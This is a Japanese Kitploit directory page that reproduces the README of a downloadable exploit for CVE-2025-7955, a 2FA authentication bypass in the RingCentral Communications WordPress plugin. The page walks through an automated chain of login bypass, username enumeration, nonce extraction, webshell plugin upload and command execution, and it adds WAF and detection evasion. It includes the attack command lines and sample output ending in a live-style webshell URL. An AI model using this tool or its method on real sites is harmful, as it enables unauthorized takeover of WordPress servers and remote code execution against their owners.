Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-7955 — RingCentral Communications 1.5 - 1.6.8 - ringcentral_admin_login_2fa_verify 関数におけるサーバーサイド検証の欠如による認証バイパス | Kitploit
ツール/GitHubGitHub/nxploited/cve-2025-7955
ペイロード生成脆弱性分析エクスプロイトシェルコードウェブアプリケーション悪用ペネトレーションテストコマンド&コントロール認証レッドチーミング
GitHubnxploited/cve-2025-7955

CVE-2025-7955

RingCentral Communications 1.5 - 1.6.8 - ringcentral_admin_login_2fa_verify 関数におけるサーバーサイド検証の欠如による認証バイパス

111ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
リポジトリを見る

CVE-2025-7955

RingCentral Communications 1.5 - 1.6.8 - サーバーサイド検証の欠如による認証バイパス(ringcentral_admin_login_2fa_verify 関数)

🚨 CVE-2025-7955 | RingCentral Communications WordPress エクスプロイト


📝 脆弱性の概要

CVE: CVE-2025-7955
影響を受けるプラグイン: RingCentral Communications (WordPress)
影響を受けるバージョン: 1.5 – 1.6.8
CVSS スコア: 9.8 (Critical)
タイプ: 認証バイパス (サーバーサイド検証の欠如)

WordPress 用 RingCentral Communications プラグインは、ringcentral_admin_login_2fa_verify() 関数内の不適切な検証により、認証バイパスに対して脆弱です。バージョン 1.5 から 1.6.8 では、認証されていない攻撃者が同一の偽コードを送信するだけで、任意のユーザーとしてログインできます。


⚡ スクリプトの機能

このエクスプロイトは、CVE-2025-7955 の攻撃チェーン全体を自動化します。次のことを行うように設計されています:

  • 認証バイパス: このスクリプトは、脆弱な 2FA エンドポイントを悪用して、パスワードを必要とせずに任意のユーザー(通常は管理者)として WordPress にログインします。
  • ユーザー名の自動検出: ユーザー名が指定されていない場合、スクリプトは WordPress REST API (/wp-json/wp/v2/users/ID) を介してユーザー名の列挙を試みます。
  • 必要なトークンの抽出: プラグインのアップロードに必要な CSRF 保護 nonce を自動的に取得します。
  • 悪意のあるプラグイン(ウェブシェル)のアップロード: 認証後、スクリプトは PHP ウェブシェルを含む ZIP プラグインをアップロードします。
  • ウェブシェルを介したコマンド実行: アップロード成功後、スクリプトはシェルを介して whoami を実行し、出力を表示することによってコード実行を実証します。
  • ステルス性と回避機能: ランダムな遅延、ローテーションする User-Agent リスト、基本的な WAF/キャプチャ検出を使用して、単純な保護を回避します。

🚀 使用方法

  1. 悪意のあるプラグインを準備する
    スクリプトと同じディレクトリに、悪意のあるプラグイン ZIP ファイル(デフォルト: Nxploit.zip)があることを確認します。

  2. エクスプロイトを実行する:

    root@kitploit:~
    python3 CVE-2025-7955.py -u http://target/wordpress [-user admin] [-id 1] [-z Nxploit.zip]
    
    • -u, --url : (必須) ターゲットの WordPress サイト URL
    • -user, --username : (任意) ログインするユーザー名(省略時は自動検出)
    • -id, --id_admin : (デフォルト: 1) ユーザー ID(管理者は通常 ID 1)
    • -z, --zip : (デフォルト: Nxploit.zip) 悪意のあるプラグイン ZIP へのパス
  3. 例:

    root@kitploit:~
    python3 CVE-2025-7955.py -u http://target/wordpress
    

    または、ユーザー名/ID を指定:


✅ 期待される成功時の出力

root@kitploit:~
888b    888                   888          d8b 888                 888 
8888b   888                   888          Y8P 888                 888 
88888b  888                   888              888                 888 
888Y88b 888 888  888 88888b.  888  .d88b.  888 888888 .d88b.   .d88888 
888 Y88b888 `Y8bd8P' 888 "88b 888 d88""88b 888 888   d8P  Y8b d88" 888 
888  Y88888   X88K   888  888 888 888  888 888 888   88888888 888  888 
888   Y8888 .d8""8b. 888 d88P 888 Y88..88P 888 Y88b. Y8b.     Y88b 888 
888    Y888 888  888 88888P"  888  "Y88P"  888  "Y888 "Y8888   "Y88888 
                     888                                               
                     888                                               
                     888                                               
CVE-2025-7955 Exploit By : Nxploited 

[*] Using User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
[*] Attempting login as: admin (ID: 1)
[+] Login successful!
[+] Nonce: 661e57f2e4
[*] Uploading malicious plugin...
[+] Plugin uploaded successfully!
[*] Executing: whoami
----------------------------------------
daemon
----------------------------------------
[+] Shell: http://target/wordpress/wp-content/plugins/Nxploit/index.php?cmd=COMMAND

🎯 主な特徴

  • パスワード不要: ロジック上の欠陥を悪用して認証を完全にバイパスします。
  • 自動列挙: 公開 API を介してユーザー名と ID を抽出できます。
  • ハンズフリーの悪用: ログインからウェブシェルのアップロード、コマンド実行まで、すべてのステップが自動化されています。
  • 基本的な回避: ランダムな遅延、ヘッダースプーフィング、基本的な保護検出。
  • モジュール式: プラグインのペイロードを簡単に変更したり、必要に応じて機能を追加したりできます。

⚠️ 免責事項

このツールは、許可されたセキュリティテストおよび教育目的のみを対象としています。
所有していない、または明示的なテスト許可を得ていないシステムへの不正使用は、違法かつ非倫理的です。
著者は、このスクリプトによって引き起こされた誤用や損害について一切の責任を負いません。


By: Khaled Alenazi (Nxploited)

ツールをダウンロード
root@kitploit:~
python3 CVE-2025-7955.py -u http://target/wordpress -user admin -id 1